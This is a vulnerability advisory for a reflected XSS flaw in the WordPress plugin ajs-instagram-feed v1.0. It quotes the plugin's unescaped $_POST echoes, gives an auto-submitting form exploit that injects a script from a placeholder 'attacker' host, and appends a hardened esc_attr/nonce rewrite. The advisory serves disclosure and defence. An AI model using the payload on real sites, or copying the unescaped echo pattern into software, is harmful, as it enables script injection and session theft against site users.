Advisory #: 1129
Title: Reflected XSS in wordpress plugin ajs-instagram-feed v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/ajs-instagram-feed
Downloads: 836
Vendor Notified: 2016-02-09
Vendor Contact: plugins@wordpress.org
Plugin Name: ajs-instagram-feed
Vulnerability:
There is a reflected XSS vulnerability in the following PHP code from ./ajs-instagram-feed/admin/partials/ajs-instagram-feed.php (numbers are source line numbers in the plugin):

  91: <input type="text" name="ajs_access_token" id="ajs_access_token" value="<?php echo $_POST['ajs_access_token']; ?>" size="60" />

  96: <td><input type="text" name="ajs_user_id" id="ajs_user_id" value="<?php echo $_POST['ajs_user_id']; ?>" size="20" />
      <span class="ajs-help-text"><?php _e('To display photos from other peoples Instagram accounts, you can use <a href="http://www.otzberg.net/iguserid/" target="_blank">this tool</a> to find their User ID.', 'ajs-instagram-feed'); ?></span></td>

  98: </table>
      <input type="hidden" name="ajs_show_username" value="<?php echo $_POST['ajs_show_username']?>" />
  99: <input type="hidden" name="ajs_show_follow_btn" value="<?php echo $_POST['ajs_show_follow_btn']?>" />

 116: <td><input type="text" name="ajs_count" id="ajs_count" value="<?php echo $_POST['ajs_count']; ?>" size="17" /></td>

 124: <td><input type="text" name="ajs_username_text_color" value="<?php echo $_POST['ajs_username_text_color']; ?>" class="ajs-color-field" data-default-color="#1c5380" /></td>

 130: <tr>
      <th><label for="show_follow_btn"><?php _e('Show Follow Button', 'ajs-instagram-feed'); ?></label></th>
      <td><input type="checkbox" name="ajs_show_follow_btn" value="yes" <?php if ($_POST['ajs_show_follow_btn']=="yes") { echo 'checked="checked"';} ?> /></td>
      </tr>
      <tr>
      <th><label for="follow_btn_text_color"><?php _e('Text Color', 'ajs-instagram-feed'); ?></label></th>
      <td><input type="text" name="ajs_follow_btn_text_color" value="<?php echo $_POST['ajs_follow_btn_text_color']; ?>" class="ajs-color-field" data-default-color="#effeff" /></td>
      </tr>
      <tr>
      <th><label for="follow_btn_bg_color"><?php _e('Background Color', 'ajs-instagram-feed'); ?></label></th>
      <td><input type="text" name="ajs_follow_btn_bg_color" value="<?php echo $_POST['ajs_follow_btn_bg_color']; ?>" class="ajs-color-field" data-default-color="#effeff" /></td>
      </tr>
      <tr>
      <th><label for="follow_btn_text"><?php _e('Button Text', 'ajs-instagram-feed'); ?></label></th>
      <td><input type="text" name="ajs_follow_btn_text" id="ajs_follow_btn_text" value="<?php echo $_POST['ajs_follow_btn_text']; ?>" size="30" /></td>
      </tr>

The ajs_access_token parameter appears to be echoed back to the user's browser unsanitized from a POST request.
CVE-ID: Not Released
File: ./ajs-instagram-feed/admin/partials/ajs-instagram-feed.php
Exploit Code:
The exploit was derived from the first vulnerable parameter that appears in the code; the other parameters shown above may be affected as well.
  This is an untested autogenerated exploit:
  XSS POST exploit modified from http://blog.portswigger.net/2007/03/exploiting-xss-in-post-requests.html

  <form name=TheForm action=http://[target]/wp-content/plugins/ajs-instagram-feed/admin/partials/ajs-instagram-feed.php method=post>
  <input type=hidden name=ajs_access_token value=&quot;&gt;&lt;script&#32;src=http://attacker/bad.js&gt;&lt;/script&gt;>
  </form>
  <script>
  document.TheForm.submit();
  </script>
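For comparison, the following is an added example of how the settings fields quoted in the Vulnerability section could be rendered without the reflected XSS. It is not the plugin's code and was not written by the advisory's author. It assumes the partial is included from a WordPress admin-menu callback (so ABSPATH and the WordPress helper functions exist); the field labels, the nonce action name 'ajs_save_settings', the nonce field name 'ajs_nonce' and the submit-button name 'ajs_save' are assumptions, not taken from the plugin. The escaping fix is esc_attr(); the ABSPATH guard, capability check and nonce address the fact that the PoC above posts directly to the partial's path rather than through a WordPress admin page.

```php
<?php
/*
 * Added example, not the plugin's own code: a hardened rewrite of the
 * settings fields quoted in the advisory. It assumes the partial is included
 * from a WordPress admin-menu callback, so ABSPATH and the WordPress helper
 * functions used below are defined. Field labels, the nonce action name and
 * the submit-button name are assumptions, not taken from the plugin.
 */

/* The PoC posts straight to
 * wp-content/plugins/ajs-instagram-feed/admin/partials/ajs-instagram-feed.php.
 * A partial should never run outside WordPress, so bail out on direct requests. */
defined( 'ABSPATH' ) || exit;

/* Settings pages are for administrators only. */
if ( ! current_user_can( 'manage_options' ) ) {
    wp_die( esc_html__( 'You do not have permission to view this page.', 'ajs-instagram-feed' ) );
}

/**
 * Read one POSTed text field safely, or return the default when it is absent.
 * wp_unslash() strips the slashes WordPress adds to request data;
 * sanitize_text_field() removes tags, invalid UTF-8 and control characters.
 */
function ajs_posted_text( $key, $default = '' ) {
    if ( ! isset( $_POST[ $key ] ) ) {
        return $default;
    }
    return sanitize_text_field( wp_unslash( $_POST[ $key ] ) );
}

/* Honour POST data only when the form carries a valid nonce. A cross-site
 * auto-submitting form like the PoC carries none, and check_admin_referer()
 * stops the request before anything is reflected. */
$submitted = isset( $_POST['ajs_save'] ) && check_admin_referer( 'ajs_save_settings', 'ajs_nonce' );

$access_token    = $submitted ? ajs_posted_text( 'ajs_access_token' ) : '';
$user_id         = $submitted ? ajs_posted_text( 'ajs_user_id' ) : '';
$show_follow_btn = $submitted && 'yes' === ajs_posted_text( 'ajs_show_follow_btn' );

/* Vulnerable pattern quoted in the advisory, for comparison (never use it):
 *     value="<?php echo $_POST['ajs_access_token']; ?>"
 * Nothing between $_POST and the HTML encodes the value, so a submitted
 * double quote closes the attribute and whatever follows becomes markup. */
?>
<form method="post" action="">
    <?php wp_nonce_field( 'ajs_save_settings', 'ajs_nonce' ); ?>
    <table class="form-table">
        <tr>
            <th><label for="ajs_access_token"><?php esc_html_e( 'Access Token', 'ajs-instagram-feed' ); ?></label></th>
            <!-- esc_attr() entity-encodes quotes, <, > and &, so the value can never terminate the attribute -->
            <td><input type="text" name="ajs_access_token" id="ajs_access_token"
                       value="<?php echo esc_attr( $access_token ); ?>" size="60" /></td>
        </tr>
        <tr>
            <th><label for="ajs_user_id"><?php esc_html_e( 'User ID', 'ajs-instagram-feed' ); ?></label></th>
            <td><input type="text" name="ajs_user_id" id="ajs_user_id"
                       value="<?php echo esc_attr( $user_id ); ?>" size="20" /></td>
        </tr>
        <tr>
            <th><label for="ajs_show_follow_btn"><?php esc_html_e( 'Show Follow Button', 'ajs-instagram-feed' ); ?></label></th>
            <!-- the checkbox state is a boolean derived from a fixed token; checked() emits the attribute itself -->
            <td><input type="checkbox" name="ajs_show_follow_btn" id="ajs_show_follow_btn" value="yes"
                       <?php checked( $show_follow_btn ); ?> /></td>
        </tr>
    </table>
    <?php submit_button( __( 'Save Settings', 'ajs-instagram-feed' ), 'primary', 'ajs_save' ); ?>
</form>
```

Every value that reaches an HTML attribute passes through esc_attr(), which is the context-correct encoder for attribute values; the hidden fields and colour fields from lines 98 to 130 of the advisory would be handled the same way. The other three checks are defence in depth: the ABSPATH guard makes a direct request to the partial's path exit immediately, the capability check keeps non-administrators away from the form, and the nonce means a forged cross-site POST is rejected before its parameters are read.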